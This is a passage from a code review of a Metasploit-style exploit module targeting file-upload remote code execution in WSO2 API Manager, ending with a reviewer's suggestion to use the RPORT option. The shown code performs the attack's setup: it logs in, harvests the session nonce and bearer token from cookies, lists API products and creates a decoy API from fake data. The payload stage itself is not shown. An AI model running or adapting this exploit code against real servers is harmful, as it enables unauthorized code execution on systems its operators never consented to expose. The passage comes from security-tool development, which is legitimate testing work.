modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

```diff
@@ -0,0 +1,409 @@
+        },
+        'keep_cookies' => true
+      )
+      if res&.get_cookies && res.get_cookies.match(/sessionNonceCookie-(.*)=/)
+        nounce = ::Regexp.last_match(1)
+      end
+      break if nounce
+
+      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    end
+
+    auth_data = {
+      'usernameUserInput' => datastore['HttpUsername'],
+      'username' => datastore['HttpUsername'],
+      'password' => datastore['HttpPassword'],
+      'sessionDataKey' => nounce
+    }
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/commonauth'),
+      'method' => 'POST',
+      'vars_post' => auth_data
+    )
+
+    loop_dectector = 0
+    while res.redirect?
+      loop_dectector += 1
+      res = send_request_cgi(
+        'uri' => res.redirection.to_s,
+        'method' => 'GET',
+        'headers' => {
+          'Connection' => 'keep-alive'
+        },
+        'keep_cookies' => true
+      )
+      if res&.get_cookies && res.get_cookies.match(/:?WSO2_AM_TOKEN_1_Default=([\w|-]+);\s/)
+        self.bearer = ::Regexp.last_match(1)
+      end
+      break if bearer
+
+      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    end
+
+    if bearer
+      print_good('Authentication successful')
+    else
+      fail_with(Failure::UnexpectedReply, 'Authentication attempt failed')
+    end
+  end
+
+  def list_product_api
+    vprint_status('Listing products APIs...')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/api/am/publisher/', target.opts['api_version'], '/api-products'),
+      'vars_get' => {
+        'limit' => 10,
+        'offset' => 0
+      },
+      'method' => 'GET',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to list APIs') unless res&.code == 200
+
+    api_list = res.get_json_document['list']
+
+    if api_list.empty?
+      print_error('No Proucts API available')
+      print_status('Trying to create an API...')
+      api_list = create_product_api
+    end
+
+    return api_list
+  end
+
+  def create_api
+    api_data = {
+      'name' => Faker::App.name,
+      'description' => Faker::Lorem.sentence,
+      'context' => "/#{Faker::Internet.slug}",
+      'version' => Faker::App.version,
+      'transport' => ['http', 'https'],
+      'tags' => [Faker::ProgrammingLanguage.name],
+      'policies' => ['Unlimited'],
+      'securityScheme' => ['oauth2'],
+      'visibility' => 'PUBLIC',
+      'businessInformation' => {
+        'businessOwner' => Faker::Name.name,
+        'businessOwnerEmail' => Faker::Internet.email,
+        'technicalOwner' => Faker::Name.name,
+        'technicalOwnerEmail' => Faker::Internet.email
+      },
+      'endpointConfig' => {
+        'endpoint_type' => 'http',
+        'sandbox_endpoints' => {
+          'url' => "https://#{target_uri.host}:9443/am/#{Faker::Internet.slug}/v1/api/"
```

Comment:
Should this use the RPORT datastore option?
```suggestion
          'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
```